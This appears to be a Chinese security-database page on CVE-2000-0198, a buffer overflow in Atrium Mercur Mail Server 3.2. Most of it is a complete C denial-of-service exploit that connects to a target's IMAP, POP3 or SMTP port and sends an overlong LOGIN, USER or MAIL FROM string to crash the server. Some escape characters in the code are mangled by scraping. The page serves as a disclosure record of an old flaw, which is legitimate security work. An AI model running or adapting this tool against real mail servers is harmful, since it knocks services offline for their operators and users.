Atrium Software Mercur Mail Server 3.2 Multiple 的缓冲区溢出漏洞

Atrium Software Mercur Mail Server 3.2 Multiple 的缓冲区溢出漏洞

漏洞ID 1105751 漏洞类型 缓冲区溢出
发布时间 2000-03-14 更新时间 2005-10-20
图片[1]-Atrium Software Mercur Mail Server 3.2 Multiple 的缓冲区溢出漏洞-安全小百科CVE编号 CVE-2000-0198
图片[2]-Atrium Software Mercur Mail Server 3.2 Multiple 的缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200003-031
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/19806
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200003-031
|漏洞详情
MERCUR邮件服务器组中的POP3和IMAP存在缓冲区溢出漏洞,远程攻击者可以利用这个漏洞触发拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/1051/info

Atrium Software Mercur is a SMTP, POP3, and IMAP mail server. Insufficient boundary checking exists in the code that handles within the SMTP "mail from" command, the POP3 "user" command and the IMAP "login" command. The application will crash if an overly long string is used as an argument to any of these commands.


 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>

void
usage (char *progname)
{
  fprintf (stderr, "Usage: %s <hostname> [type]n", progname);
  fprintf (stderr, "   Type:n");
  fprintf (stderr, "      0 - IMAP4 (Default)n");
  fprintf (stderr, "      1 - POP3n");
  fprintf (stderr, "      2 - SMTPnn");
  exit (1);
}

int
main (int argc, char **argv)
{
  char *ptr, buffer[3000], remotedos[3100];
  int aux, sock, type;
  struct sockaddr_in sin;
  unsigned long ip;
  struct hostent *he;

  fprintf (stderr,
   "n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-n");

  if (argc < 2)
    usage (argv[0]);

  type = 0;
  if (argc > 2)
    type = atol (argv[2]);

  ptr = buffer;
  switch (type)
    {
    case 1:
      memset (ptr, 0, 2048);
      memset (ptr, 88, 2046);
      break;
    default:
      memset (ptr, 0, sizeof (buffer));
      memset (ptr, 88, sizeof (buffer) - 2);
      break;
    }

  bzero (remotedos, sizeof (remotedos));

  switch (type)
    {
    case 1:
      snprintf (remotedos, sizeof (remotedos), "USER %srnrnrn", =
buffer);
      break;
    case 2:
      snprintf (remotedos, sizeof (remotedos),
"MAIL FROM: %[email protected]", buffer);
      break;
    default:
      snprintf (remotedos, sizeof (remotedos), "1000 LOGIN =
%srnrnrn",
buffer);
      break;
    }

  if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    {
      perror ("socket()");
      return -1;
    }

  if ((he = gethostbyname (argv[1])) != NULL)
    {
      ip = *(unsigned long *) he->h_addr;
    }
  else
    {
      if ((ip = inet_addr (argv[1])) == NULL)
{
  perror ("inet_addr()");
  return -1;
}
    }

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = ip;

  switch (type)
    {
    case 1:
      sin.sin_port = htons (110);
      break;
    case 2:
      sin.sin_port = htons (25);
      break;
    default:
      sin.sin_port = htons (143);
      break;
    }

  if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
    {
      perror ("connect()");
      return -1;
    }

  switch (type)
    {
    case 1:
      fprintf (stderr, "nEngaged Mercur POP3... Sending data...n");
      break;
    case 2:
      fprintf (stderr, "nEngaged Mercur SMTP... Sending data...n");
      break;
    default:
      fprintf (stderr, "nEngaged Mercur IMAP4... Sending data...n");
      break;
    }

  if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
    {
      perror ("write()");
      return -1;
    }

  sleep (4);

  fprintf (stderr, "Bye Bye baby!...nn");
  if (close (sock) < 0)
    {
      perror ("close()");
      return -1;
    }

  return (0);
}
|参考资料

来源:BID
名称:1051
链接:http://www.securityfocus.com/bid/1051
来源:NTBUGTRAQ
名称:20000314Local/RemoteMultiplesRemoteDoSAttacksinMERCURv3.2*forWindows98/NTVulnerability
链接:http://archives.neohapsis.com/archives/ntbugtraq/current/0206.html
来源:BUGTRAQ
名称:20000314Local/RemoteMultiplesRemoteDoSAttacksinMERCURv3.2*forWindows98/NTVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/current/0137.html

相关推荐: Cisco VPN Client Predictable Sequence Number Vulnerability

Cisco VPN Client Predictable Sequence Number Vulnerability 漏洞ID 1101563 漏洞类型 Design Error 发布时间 2002-09-05 更新时间 2002-09-05 CVE编号 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享